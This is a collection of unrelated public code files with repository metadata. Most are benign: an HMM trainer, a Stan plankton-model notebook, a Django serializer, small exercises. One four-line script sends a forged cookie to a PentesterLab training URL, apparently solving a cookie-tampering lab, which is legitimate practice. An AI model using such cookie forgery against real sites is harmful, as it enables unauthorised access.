alpha[i, s2] += alpha[i - 1, s1] * transition * O[s2, observations[i]]
# handling missing
else:
alpha[i, s2] += alpha[i - 1, s1] * transition
return alpha, np.sum(alpha[N - 1, :])
def backward(params, observations):
pi, A, O = params
N = len(observations)
S = pi.shape[0]
beta = np.zeros((N, S))
# base case
beta[N - 1, :] = 1
# recursive case
for i in range(N - 2, -1, -1):
for s1 in range(S):
for s2 in range(S):
if observations[i + 1] != -1:
beta[i, s1] += beta[i + 1, s2] * A[s1, s2] * O[s2, observations[i + 1]]
# handling missings
else:
beta[i, s1] += beta[i + 1, s2] * A[s1, s2]
return beta, np.sum(pi * O[:, observations[0]] * beta[0, :])
# this is a modified version of Baum_Welch
# threshold: is intended to compare with the fractional change
# policy: contains the begin and end indexes needed to calculate the fractional change e.g [[0, 9], [-10, -1]]
# label: is the hidden state of the GHMM which needs regulation by gate mechanism
# labels for the training data are expected to be at the end of each sequence in the training data
def ghmm(training, pi, A, O, iterations, threshold, policy, label):
pi, A, O = np.copy(pi), np.copy(A), np.copy(O)
S = pi.shape[0]
begin = policy[0]
end = policy[1]
# do several steps of EM hill climbing
for it in range(iterations):
pi1 = np.zeros_like(pi)
A1 = np.zeros_like(A)
O1 = np.zeros_like(O)
for observations in training:
obs = observations[:-1]
# compute forward-backward matrices
alpha, za = forward((pi, A, O), obs, observations[-1]) # observations[-1] is the label of the sequence
beta, zb = backward((pi, A, O), obs)
# calculate sums at the desired indexes in the sequence for fractional change
sum_begin = np.sum(obs[begin[0]:begin[1]]) + obs[begin[0]:begin[1]].count(-1)
sum_end = np.sum(obs[end[0]:end[1]]) + obs[end[0]:end[1]].count(-1)
fractional_change = (abs(sum_begin - sum_end)) / sum_begin
# M-step here, calculating the frequency of starting state, transitions and (state, obs) pairs
pi1 += alpha[0, :] * beta[0, :] / za
for i in range(0, len(obs)):
# handling missings
if obs[i] != -1:
O1[:, obs[i]] += alpha[i, :] * beta[i, :] / za
for i in range(1, len(obs)):
for s1 in range(S):
for s2 in range(S):
trans = A[s1, s2]
# gate mechanism: affect the update by considering fractional_change
if s2 == label and fractional_change < threshold:
trans = 0
if obs[i] != -1:
A1[s1, s2] += alpha[i - 1, s1] * trans * O[s2, obs[i]] * beta[i, s2] / za
else:
A1[s1, s2] += alpha[i - 1, s1] * trans * beta[i, s2] / za
# normalise pi1, A1, O1
pi = pi1 / np.sum(pi1)
for s in range(S):
A[s, :] = A1[s, :] / np.sum(A1[s, :])
O[s, :] = O1[s, :] / np.sum(O1[s, :])
return pi, A, O
# quick test
a = np.array([[0.6, 0.4], [0.4, 0.6]])
p = np.array([0.7, 0.3])
o = np.array([[0.7, 0.1, 0.2, 0, 0, 0], [0, 0., 0.3, .4, .2, .1]])
label_0, label_1 = 0, 1
# the first two sequences have fractional change higher than threshold and the other two lower
data = [[4, 4, 3, 2, -1, -1, 3, 4, 1, 1, 0, label_0],
[4, 3, 3, -1, 3, -1, 3, -1, 1, 1, 1, label_0],
[5, 5, 5, 3, 4, -1, -1, -1, 4, 5, 4, label_1],
[4, 5, -1, 3, 4, 5, -1, -1, -1, 5, 3, label_1]]
start_prob, transition_prob, emission_prob = ghmm(data, p, a, o, 10,
threshold=.51, policy=[[0, 2], [-2, -1]], label=label_0)
print(start_prob)
print(transition_prob)
print(emission_prob)
print('\n')
# do perdiction for a new sequence without having label
sequence = [5, 4, -1, 4, 4, 5, -1, -1, -1, 5, 4]
fwd, s = forward((start_prob, transition_prob, emission_prob), sequence)
prob = fwd[len(sequence) - 1, 1] / s
print("prediction probability: {}".format(prob))
print("predicted label: {}".format(1 if prob > .5 else 0))
|
[
"negars@kth.se"
] |
negars@kth.se
|
aab5b930200d680d23a2dbddf6c89da66a40ebc7
|
9460ee7136f277825b09e5f63675364461deacea
|
/GATE_Engine/libs/par/test/hierarchy.py
|
2f4e7fa88ecb974f8c8b074c616372ebccf3eb99
|
[
"MIT"
] |
permissive
|
DocDonkeys/GATE_Engine
|
9c4a5376e10e20774c20ec3f069b973e754cb058
|
bb2868884c6eec0ef619a45b7e21f5cf3857fe1b
|
refs/heads/master
| 2020-07-27T09:18:46.947405
| 2019-12-30T16:16:11
| 2019-12-30T16:16:11
| 209,041,360
| 1
| 3
|
MIT
| 2020-02-19T16:32:08
| 2019-09-17T11:58:13
|
C++
|
UTF-8
|
Python
| false
| false
| 442
|
py
|
import json
flare = json.load(open('flare.json'))
print flare
things = []
def traverse(node, parent):
me = len(things)
print '{:3} {}'.format(me, node['name'])
things.append(parent)
children = node.get('children', [])
for child in children:
traverse(child, me)
traverse(flare, 0)
for i in xrange(len(things)):
print '{:3},'.format(things[i]),
if (i + 1) % 12 == 0: print;
print '---\n', len(things)
|
[
"36265669+DidacRomero@users.noreply.github.com"
] |
36265669+DidacRomero@users.noreply.github.com
|
82355523e5e347b9831a1ae711165e2ece5d664f
|
4aae80d02949928e859ea9536051f59ed14ec918
|
/apartment/house_summary.py
|
12793965147a94786cc6eaa2e1738a092d991116
|
[] |
no_license
|
xli1234/PythonProject
|
a6c5c61b8fb86d8b9b7dc2d39d3784db3184a46b
|
e2555e8befd086ac98881a91630b1260cf6709f0
|
refs/heads/master
| 2020-07-31T05:46:11.688485
| 2019-10-08T02:04:42
| 2019-10-08T02:04:42
| 210,504,536
| 4
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 535
|
py
|
import pandas as pd
def summary_house():
df = pd.read_csv('apartment/house_cache.csv')
zip_area = {15213: 'Oakland', 15217: 'Squirrel Hill', 15232: 'Shadyside'}
house_count = list(df[['Zip', 'Street']].groupby('Zip').count().values.reshape(3))
house_area = list(df[['Zip', 'Street']].groupby('Zip').count().index)
print('All three areas'.rjust(20), str(sum(house_count)).rjust(5), 'houses/apartments')
for i in range(len(house_area)):
print(zip_area[house_area[i]].rjust(20), str(house_count[i]).rjust(5), 'houses/apartments')
|
[
"34395567+shenshopping@users.noreply.github.com"
] |
34395567+shenshopping@users.noreply.github.com
|
09b1947d280f745d62a37740eb2545109fa7aba2
|
9ee0f0850d8743d08a2ecdf16e0e79ad58615908
|
/Arrendador/serializers.py
|
cabceb1ac480eb63740d2b5e64a3c8ee0f187ca9
|
[] |
no_license
|
alexgrajales/plataforma-web-de-gesti-n-de-inmuebles-para-arrendatarios-independientes.
|
20fb4ebb60940cd9fa40010515e8116cb4418d39
|
ce335f05ff6f217a5c3b94022b51bf37b46adf5c
|
refs/heads/master
| 2022-11-04T08:01:14.427926
| 2017-12-01T22:16:56
| 2017-12-01T22:16:56
| 110,597,537
| 0
| 1
| null | 2022-10-05T04:58:51
| 2017-11-13T20:20:53
|
Python
|
UTF-8
|
Python
| false
| false
| 271
|
py
|
from rest_framework import serializers
from rest_framework_mongoengine import serializers as mongoserializers
from Arrendador.models import Arrendador
class ArrendadorSerializer(mongoserializers.DocumentSerializer):
class Meta:
model = Arrendador
fields = '__all__'
|
[
"alex-12-04@hotmail.com"
] |
alex-12-04@hotmail.com
|
3ae6423a2a19cb9678453bb48e72fd82b6afb002
|
36a92a0af4e4fa2b8191ddb8b0f0b8ed15c2baca
|
/send-cookies.py
|
999fd98911a1e0cbd4ef3f5f1e1606a3e11aad21
|
[] |
no_license
|
p4r7h/Python-script
|
043d6b70387f1834fac147e0ee88cfbb416ea205
|
45e0c39849c0a885b26db433cdfa94f885e1988b
|
refs/heads/main
| 2023-06-12T03:09:26.333375
| 2021-06-21T01:23:08
| 2021-06-21T01:23:08
| 344,584,712
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 141
|
py
|
import requests
url = 'http://ptl-e1cf1322-eb626166.libcurl.so/pentesterlab'
x = requests.get(url, cookies = {'key': 'please'})
print(x.text)
|
[
"noreply@github.com"
] |
p4r7h.noreply@github.com
|
e6f8f51a840280d413cfe95488d13ed729fe6b2e
|
3c2bb35d04a2dd44e16366c6e52eb74ecf8ba87b
|
/linearsearch.py
|
27f9b69282c90729ee8439a664c1be6609b2dad0
|
[] |
no_license
|
Brijesh-Pandey/Python-Programs-For-Noobs
|
7c871ebf01ce5f9e4cfa53b100b8f1b569f72a5d
|
1d7187986a26d3f7ebcf3699017ab242dd16b482
|
refs/heads/main
| 2023-08-18T01:46:22.533629
| 2021-10-09T20:06:30
| 2021-10-21T01:37:49
| 301,089,699
| 6
| 11
| null | 2021-05-18T09:27:14
| 2020-10-04T09:32:23
|
Python
|
UTF-8
|
Python
| false
| false
| 247
|
py
|
z=int(input("Enter element to be searched "))
li=[int(x) for x in input().split()]
for i in range(len(li)):
if li[i]==z:
flag=1
break
else:
flag=0
if flag==1:
print("Found at position ",+i+1 )
else:
print("Not found")
input()
|
[
"noreply@github.com"
] |
Brijesh-Pandey.noreply@github.com
|
9c49e6ca3bd2a42e53334ed4c4c2dee500c889b3
|
ee1db6398a73882e750c86257b43390c5ec2a654
|
/fpm/setup.py
|
84cf025ee77323c37d5387470fd713ac4504e1a1
|
[
"MIT"
] |
permissive
|
gscigala/packet-generation
|
c795131e202e59d16fc99eca61008b850df9c6c5
|
137b2853e57756a9ade1af2e95c8b2839f401121
|
refs/heads/master
| 2021-01-23T03:12:48.984559
| 2017-04-04T13:50:46
| 2017-04-04T13:50:46
| 86,057,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,869
|
py
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='test_sample',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='1.0.0',
description='A GStreamer test video project',
long_description=long_description,
# The project's main homepage.
url='https://github.com/gscigala/packet-generation',
# Author details
author='Guillaume Scigala',
author_email='guillaume@scigala.fr',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7'
],
# What does your project relate to?
keywords='sample setuptools development streaming',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
#install_requires=['peppercorn'],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
#'dev': ['check-manifest'],
#'test': ['coverage'],
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
package_data={
'test_sample': [
'data/logging.conf'
],
},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'testSample=test_sample.__main__:main',
],
},
)
|
[
"guillaume.scigala@smile.fr"
] |
guillaume.scigala@smile.fr
|
3a605cd5f0f7781f3d75d4937b802eac9ac2dd09
|
4accbb2bb2f7cc2b6b5855afe52c1bb4561c8da6
|
/Unstructured Programs For Testing/CSVtoNumpy2.py
|
85b4f08e7b464e239c7ab173dd45a90b55e10ebf
|
[] |
no_license
|
WrathTitan/DLNeuralNetwork
|
e993f37faca865c369138ea61b346f9a998ad690
|
c82ba35c1cf6cd20c573200d4c3f038e8f434d9e
|
refs/heads/master
| 2023-04-04T06:50:19.007794
| 2021-04-23T16:18:10
| 2021-04-23T16:18:10
| 307,389,978
| 0
| 0
| null | 2020-10-29T16:24:58
| 2020-10-26T13:57:02
|
Python
|
UTF-8
|
Python
| false
| false
| 565
|
py
|
import numpy as np
import csv
myarr=np.genfromtxt('superfilteredFinal.csv',delimiter=',')
print(myarr)
print(myarr.shape)
print(myarr.T)
print("Ended one file")
mynewarr=np.genfromtxt('filteredFinal.csv',delimiter=',')
awesomestuff=mynewarr[:,1:]
print(awesomestuff)
print(awesomestuff.shape)
print(awesomestuff.T)
#my_data=pd.read_csv('superfilteredFinal.csv',sep=',',header=None)
#data_X=my_data.T
#print(data_X)
#print(data_X.shape)
#my_data=pd.read_csv('filteredFinal.csv',sep=',',header=None).T
#data_Y=my_data.iloc[1:,]
#print(data_Y)
#print(data_Y.shape)
|
[
"rishabhbhatt159@gmail.com"
] |
rishabhbhatt159@gmail.com
|
f794cd1dae5cb4ed8da0fc22286c5a047b86c2fa
|
d8a541a2953c9729311059585bb0fca9003bd6ef
|
/Lists as stack ques/cups_and_bottles.py
|
efc8af013cd606d663a6539b7b98d2807e6c28fc
|
[] |
no_license
|
grigor-stoyanov/PythonAdvanced
|
ef7d628d2b81ff683ed8dd47ee307c41b2276dd4
|
0a6bccc7faf1acaa01979d1e23cfee8ec29745b2
|
refs/heads/main
| 2023-06-10T09:58:04.790197
| 2021-07-03T02:52:20
| 2021-07-03T02:52:20
| 332,509,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 604
|
py
|
from collections import deque
cups = deque(map(int, input().split()))
bottles = list(map(int, input().split()))
wasted_water = 0
while cups and bottles:
current_cup = cups.popleft()
while current_cup > 0 and bottles:
current_bottle = bottles.pop()
current_cup -= current_bottle
if current_cup < 0:
wasted_water += -current_cup
if not cups:
print('Bottles: ', end='')
print(*[bottles.pop() for i in range(len(bottles))])
else:
print('Cups: ', end='')
print(*[cups.popleft() for i in range(len(cups))])
print(f'Wasted litters of water: {wasted_water}')
|
[
"76039296+codelocks7@users.noreply.github.com"
] |
76039296+codelocks7@users.noreply.github.com
|
407664d79d63688fa1904fc5d1148aa5d8d4d2ce
|
d1b6ca6d310d646b64385ed87fed71ccec1cb6e3
|
/about_page.py
|
d42e1a4def82ac173833b9d7e2fa07e51909c25b
|
[] |
no_license
|
skaushikk/USCIS-tracker
|
7053d5af295632c8c1fa4ca0579cbf56e33497a4
|
1f4219c311f1a99a682fca6789e7922747338d2a
|
refs/heads/main
| 2023-04-24T18:08:03.714906
| 2021-05-09T02:16:55
| 2021-05-09T02:16:55
| 361,353,468
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,714
|
py
|
import streamlit as st
def app():
st.title('USCIS Case Status Analyzer')
st.subheader('Check, Analyze and Predict USCIS Application Status')
# st.markdown("<h3 style='text-align: right; color: gray;'>-- Kaushik Sirvole</h3>", unsafe_allow_html=True)
with st.beta_expander("ABOUT", expanded=True):
# st.subheader('ABOUT')
st.write('USCIS Case Status Tracker app is built to help, people who have a pending '
'application with the United States Citizenship and Immigration Services (USCIS)'
'by educating, tracking, predicting their case with respect to other similar '
'applications. Similar applications are defined as those of the same kind, from same locations'
'and applied during similar times')
st.write('The current indefinite uncertain timeline due to political climate, COVID protocols, '
'resulted in unprecedented strain on USCIS servicing capabilities and consequently piling on '
'extreme stress to the applicants with lives on hold waiting for the adjudication. ')
st.write('Furthermore, this app provides a platform for more broader, indepth analysis and prediction')
with st.beta_expander("DISCLAIMER", expanded=False):
st.write('The application does not store any user information at all. All the information provided is from '
'publicly available data.')
with st.beta_expander("KNOWLEDGEBASE", expanded=False):
st.write("The details on different types of forms, terminology can be found in the USCIS information pages"
"https://www.uscis.gov/tools/a-z-index")
# st.selectbox()
|
[
"skaushikk@gmail.com"
] |
skaushikk@gmail.com
|
fc140be5ed838830be722cb050742cde1b3cb053
|
87455bab2ddf7c9312453ca74689b133f3d6745d
|
/case_studies/npz/scripts/npz_narragansett_py.py
|
879eba3573907047de566834166742228e1a45bb
|
[] |
no_license
|
maxEntropyProd/bayesian_cbiomes
|
dd87d7f88e127e5f0699d15ae0ec3f2380b9ba89
|
c3a2f2e60f2271a0a4843e9db6be2111b765efa1
|
refs/heads/master
| 2020-12-06T06:30:34.433777
| 2020-01-10T14:06:20
| 2020-01-10T14:06:20
| 232,373,541
| 0
| 0
| null | 2020-01-07T17:01:40
| 2020-01-07T17:01:39
| null |
UTF-8
|
Python
| false
| false
| 14,243
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # Confront the NPZ model with real data from Narrangansett Bay
#
# ## 1. A first look at the data
# In[1]:
import numpy as np
# load data from CSV file
datafile = 'data/data_npz_narragansett.csv'
data = np.loadtxt(datafile, skiprows=1, delimiter=',')
with open(datafile) as f:
data_names = f.readline().strip().split(',')
print(data_names)
# In[14]:
import matplotlib.pyplot as plt
fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12))
for iax,ax in enumerate(axs.flat[:-1]):
ax.plot(data[:,0], data[:,iax+1])
ax.set_ylabel(data_names[iax+1])
ax.grid(True)
axs[0].set_title('Narragansett Bay NPZ data')
axs[0].axhline(0.25, color='darkred')
axs[-1].plot(data[:,0], np.sum(data[:,1:],axis=1))
axs[-1].set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,data[-1,0],365.0))
axs[-1].grid(True)
# ### challenges for fitting data:
# * high noise level
# * no conservation of mass while NPZ model conserves mass
# ## 2. Modifications to the NPZ model
#
# allow influx and loss of N in the model:
# * introduce a background concentration for each variable and allow mixing with that background concentration
# * have a winter period for each year with stronger mixing and different background concentrations
# * estimate start and duration of winter period for each year (initial guess is based on data)
# * estimate background concentrations for winter and regular period (same for each year)
#
#
# In[3]:
# base initial guess of start and duration of the winter period based on N crossing a 0.25 threshold
stan_code_dataparams = '''data {
int<lower=0> nobs; // number of timesteps with observations
real<lower=0> tobs[nobs]; // obs times
int<lower=0> nobsvar; // number of observed variables
int<lower=0> iobsvar[nobsvar]; // index of observed variable (N=1, P=2, Z=3)
real<lower=0> obs[nobs,nobsvar]; // observed variable at measurement times
int<lower=0> nyears; // number of years (number of winters to add to the model)
}
transformed data {
real wintermixstart_guess[nyears];
real wintermixduration_guess[nyears];
{
int start = 0;
int iyear = 1;
real thresh = 0.25;
for (it in 1:nobs){
if (start == 0 && obs[it,1] >= thresh){
start = 1;
wintermixstart_guess[iyear] = tobs[it];
} else if (start == 1 && obs[it,1] < thresh && obs[it+1,1] < thresh){
start = 0;
wintermixduration_guess[iyear] = tobs[it] - wintermixstart_guess[iyear];
wintermixstart_guess[iyear] -= 365.0*(iyear-1);
iyear += 1;
if (iyear > nyears){
break;
}
}
}
}
// will be printed once by every chain
print("wintermixstart_guess = ",wintermixstart_guess);
print("wintermixduration_guess = ",wintermixduration_guess);
}
parameters {
real<lower=0> vmax; // maximum growth rate in Michaelis Menten formulation
real<lower=0> nuthalfsat; // nutrient half saturation in Michaelis Menten formulation
real<lower=0> graz; // zooplankton grazing rate
real<lower=0> mort_p; // phytoplankton mortality rate
real<lower=0> mort_z; // zooplankton mortality rate
real<lower=0> bgconc_n1; // N background concentration regular
real<lower=0> bgconc_n2; // N background concentration winter
real<lower=0> bgconc_p1; // P background concentration regular
real<lower=0> bgconc_p2; // P background concentration winter
real<lower=0> bgconc_z1; // Z background concentration regular
real<lower=0> bgconc_z2; // Z background concentration winter
real<lower=0> mix1; // mixing strength regular
real<lower=0> mix2; // mixing strength winter
real<lower=-100.0,upper=200.0> wintermixstart[nyears]; // start of winter mixing, restricted to broad winter period
real<lower=0> wintermixduration[nyears]; // duration of winter mixing
real<lower=1E-15> sigma[nobsvar]; // observation error standard deviations
real<lower=0> x0[3]; // initial conditions
}
transformed parameters {
real theta[13+2*nyears];
real x[nobs,3];
theta[1] = vmax;
theta[2] = nuthalfsat;
theta[3] = graz;
theta[4] = mort_p;
theta[5] = mort_z;
theta[6] = bgconc_n1;
theta[7] = bgconc_n2;
theta[8] = bgconc_p1;
theta[9] = bgconc_p2;
theta[10] = bgconc_z1;
theta[11] = bgconc_z2;
theta[12] = mix1;
theta[13] = mix2;
for (iyear in 1:nyears){
theta[13+2*iyear-1] = wintermixstart[iyear] + (iyear-1)*365.0;
theta[13+2*iyear] = theta[13+2*iyear-1] + wintermixduration[iyear];
}
x = integrate_ode_rk45(npz, x0, -1, tobs, theta,
rep_array(0.0, 0), rep_array(0, 0),
1e-5, 1e-4, 2e3*nyears);
}
'''
# In[4]:
# for now, do not fit data
stan_code_model_nofit = '''model {
x0[1] ~ normal(0.3, 0.1); // prior on N initial conditions
x0[2] ~ normal(0.1, 0.1); // prior on P initial conditions
x0[3] ~ normal(0.1, 0.1); // prior on Z initial conditions
sigma ~ exponential(1.0);
// priors for parameters
vmax ~ normal(0.15, 0.03);
nuthalfsat ~ normal(0.17, 0.04);
graz ~ normal(0.15, 0.04);
mort_p ~ normal(0.02, 0.01);
mort_z ~ normal(0.02, 0.005);
bgconc_n1 ~ normal(0.01, 0.001); // (regular)
bgconc_n2 ~ normal(0.66, 0.08); // (winter)
bgconc_p1 ~ normal(0.11, 0.01); // (regular)
bgconc_p2 ~ normal(0.05, 0.005); // (winter)
bgconc_z1 ~ normal(0.09, 0.01); // (regular)
bgconc_z2 ~ normal(0.05, 0.03); // (winter)
mix1 ~ normal(0.01, 0.03); // (regular)
mix2 ~ normal(0.19, 0.02); // (winter)
for (iyear in 1:nyears){
wintermixstart[iyear] ~ normal(wintermixstart_guess[iyear], 10.0);
wintermixduration[iyear] ~ normal(wintermixduration_guess[iyear], 10.0);
}
// no fitting of data yet
}
'''
# In[5]:
# mixing/exchange with background concentrations is implemented using a nudging/relaxation term
stan_code_functions = '''functions {
real[] npz(real t, // time
real[] x, // state
real[] theta, // parameters
real[] x_r, // real-valued input data (empty)
int[] x_i) { // integer-valued input data (empty)
/*
guide to theta:
theta[1]: vmax maximum growth rate in Michaelis Menten formulation
theta[2]: nuthalfsat nutrient half saturation in Michaelis Menten formulation
theta[3]: graz zooplankton grazing rate
theta[4]: mort_p phytoplankton mortality rate
theta[5]: mort_z zooplankton mortality rate
theta[6]: bgconc_n1 N background concentration regular
theta[7]: bgconc_n2 N background concentration winter
theta[8]: bgconc_p1 P background concentration regular
theta[9]: bgconc_p2 P background concentration winter
theta[10]: bgconc_z1 Z background concentration regular
theta[11]: bgconc_z2 Z background concentration winter
theta[12]: mix1 mixing strength regular
theta[13]: mix2 mixing strength winter
theta[14]: start time of first winter
theta[15]: stop time of first winter
theta[16]: start time of second winter
theta[17]: stop time of second winter
... number of winters is set to nyears
*/
real n = fmax(0.0, x[1]);
real p = fmax(0.0, x[2]);
real z = fmax(0.0, x[3]);
real growth = theta[1]*n/(theta[2]+n) * p; // nutrient-dependent growth
real grazing = theta[3]*p*z; // grazing
real ploss = theta[4]*p; // linear phytoplankton mortality
real zloss = theta[5]*z*z; // quadratic zooplankton mortality
// N,P,Z gain or loss terms due to mixing/exchange with background
real exch_n;
real exch_p;
real exch_z;
int i = 14;
while (i <= size(theta) && t>=theta[i]){
i += 1;
}
if ((i-13)%2 == 1){
// regular (non-winter) time
exch_n = theta[12]*(theta[6]-n);
exch_p = theta[12]*(theta[8]-p);
exch_z = theta[12]*(theta[10]-z);
} else {
// winter time
exch_n = theta[13]*(theta[7]-n);
exch_p = theta[13]*(theta[9]-p);
exch_z = theta[13]*(theta[11]-z);
}
return {-growth+ploss+zloss+exch_n,growth-grazing-ploss+exch_p,grazing-zloss+exch_z};
}
}
'''
# ## 3. Sampling from the prior
#
# Because we are not yet fitting data in the model, the Stan output are samples from the prior model solution.
# In[6]:
import pystan
# stitch together the code and compile it
stan_code = stan_code_functions + stan_code_dataparams + stan_code_model_nofit
model = pystan.StanModel(model_code=stan_code, model_name='NPZ')
# In[7]:
# reduce the dataset (to decrease runtime)
nyears = 2
index = data[:,0] <= nyears * 365
stan_data = {
'nobs':sum(index),
'tobs':data[index,0],
'nobsvar':3,
'iobsvar':(1,2,3), # all variables are observed
'obs':data[index,1:],
'nyears':nyears,
}
# In[8]:
# run the model, note low number of iterations/length of chain
mcmc = model.sampling(data=stan_data, iter=1000)
print(mcmc)
# In[9]:
# plot 100 randomly chosen prior solutions
index_prior = np.random.choice(mcmc['x'].shape[0], 100, replace=False)
t = data[index,0]
fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12))
for iax,ax in enumerate(axs.flat[:-1]):
ax.plot(t, data[index,iax+1])
ax.plot(t, mcmc['x'][index_prior,:,iax].T, color='k', alpha=0.1)
ax.set_ylabel(data_names[iax+1])
ax.grid(True)
axs[0].set_title('Narragansett Bay NPZ data and samples from the model prior')
axs[-1].plot(t, np.sum(data[index,1:],axis=1))
axs[-1].plot(t, np.sum(mcmc['x'][index_prior,:,:],axis=2).T, color='k', alpha=0.1)
axs[-1].set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,nyears*365.0,365.0))
axs[-1].grid(True)
None
# ## 4. Reparameterizing the model and fitting data
#
# Normally we would use a statement like
# ```
# for(i in 1:nobsvar){
# for (iobs in 1:nobs){
# obs[iobs,i] ~ normal(x[iobs,iobsvar[i]], sigma[i]);
# }
# }
# ```
# in Stan's model block to fit the data. When formulated this way, Stan can have trouble sampling from the posterior distribution, for example when `sigma[i]` changes greatly for different values of `x[iobs,iobsvar[i]]`.
#
# Here it helps *a lot* (decrease in runtime by 1-2 orders of magnitude) to reparameterize the model:
# ```
# for(i in 1:nobsvar){
# for (iobs in 1:nobs){
# obs_normalized = (obs[iobs,i]-x[iobs,iobsvar[i]])/sigma[i];
# obs_normalized ~ std_normal();
# }
# }
# ```
#
# For more information, see the corresponding section in the [Stan user guide](https://mc-stan.org/docs/stan-users-guide/reparameterization-section.html).
# In[10]:
# reparameterized model block
stan_code_model = '''model {
real obs_normalized;
x0[1] ~ normal(0.3, 0.1); // prior on N initial conditions
x0[2] ~ normal(0.1, 0.1); // prior on P initial conditions
x0[3] ~ normal(0.1, 0.1); // prior on Z initial conditions
sigma ~ exponential(1.0);
// priors for parameters
vmax ~ normal(0.15, 0.03);
nuthalfsat ~ normal(0.17, 0.04);
graz ~ normal(0.15, 0.04);
mort_p ~ normal(0.02, 0.01);
mort_z ~ normal(0.02, 0.005);
bgconc_n1 ~ normal(0.01, 0.001); // (regular)
bgconc_n2 ~ normal(0.66, 0.08); // (winter)
bgconc_p1 ~ normal(0.11, 0.01); // (regular)
bgconc_p2 ~ normal(0.05, 0.005); // (winter)
bgconc_z1 ~ normal(0.09, 0.01); // (regular)
bgconc_z2 ~ normal(0.05, 0.03); // (winter)
mix1 ~ normal(0.01, 0.03); // (regular)
mix2 ~ normal(0.19, 0.02); // (winter)
for (iyear in 1:nyears){
wintermixstart[iyear] ~ normal(wintermixstart_guess[iyear], 10.0);
wintermixduration[iyear] ~ normal(wintermixduration_guess[iyear], 10.0);
}
// fitting the observations
for(i in 1:nobsvar){
for (iobs in 1:nobs){
obs_normalized = (obs[iobs,i]-x[iobs,iobsvar[i]])/sigma[i];
obs_normalized ~ std_normal();
}
}
}
'''
# In[11]:
# stitch together the updated code and compile it
stan_code = stan_code_functions + stan_code_dataparams + stan_code_model
model = pystan.StanModel(model_code=stan_code, model_name='NPZ')
# In[12]:
mcmc = model.sampling(data=stan_data, iter=2000)
print(mcmc)
# In[13]:
q = (5,25,50,75,95)
x_perc = np.percentile(mcmc['x'], q, axis=0)
fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12))
for iax,ax in enumerate(axs.flat[:-1]):
ax.plot(t, data[index,iax+1])
ax.fill_between(t, x_perc[0,:,iax], x_perc[-1,:,iax], alpha=0.2, color='C1')
ax.fill_between(t, x_perc[1,:,iax], x_perc[-2,:,iax], alpha=0.5, color='C1')
ax.plot(t, x_perc[2,:,iax], label='model', color='C1')
ax.set_ylabel(data_names[iax+1])
ax.grid(True)
axs[0].set_title('Narragansett Bay NPZ data and model posterior quantiles')
ax = axs[-1]
ax.plot(t, np.sum(data[index,1:],axis=1))
ax.fill_between(t, np.sum(x_perc[0,:,:],axis=1), np.sum(x_perc[-1,:,:],axis=1), alpha=0.2, color='C1')
ax.fill_between(t, np.sum(x_perc[1,:,:],axis=1), np.sum(x_perc[-2,:,:],axis=1), alpha=0.5, color='C1')
ax.plot(t, np.sum(x_perc[2,:,:],axis=1), label='model', color='C1')
ax.set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,nyears*365.0,365.0))
ax.grid(True)
|
[
"gregleebritten@gmail.com"
] |
gregleebritten@gmail.com
|
18b12259ea05cacdcb9d10fcdd104daa667751b6
|
4b59ace76840cbeb28f0fac19f128cd3959a7c3a
|
/catalog/api/v1/utility.py
|
4b15a94bb676733ffce5e82f091fc6cde3d1ce2c
|
[] |
no_license
|
JoshuadeJong/ecommerce-microservice
|
2a8f4d2f091c459dc9bcb47c01904f21c478cf91
|
246c6d0eb014df2946874cafcddebea1e0eaa97d
|
refs/heads/master
| 2023-03-25T23:57:15.369285
| 2021-03-19T15:47:32
| 2021-03-19T15:47:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
def item2dict(item_id, item) -> dict:
return {
"id": item_id,
"name": item.name,
"description": item.description,
"price": item.price,
"stock": item.stock
}
|
[
"joshuakdejong@gmail.com"
] |
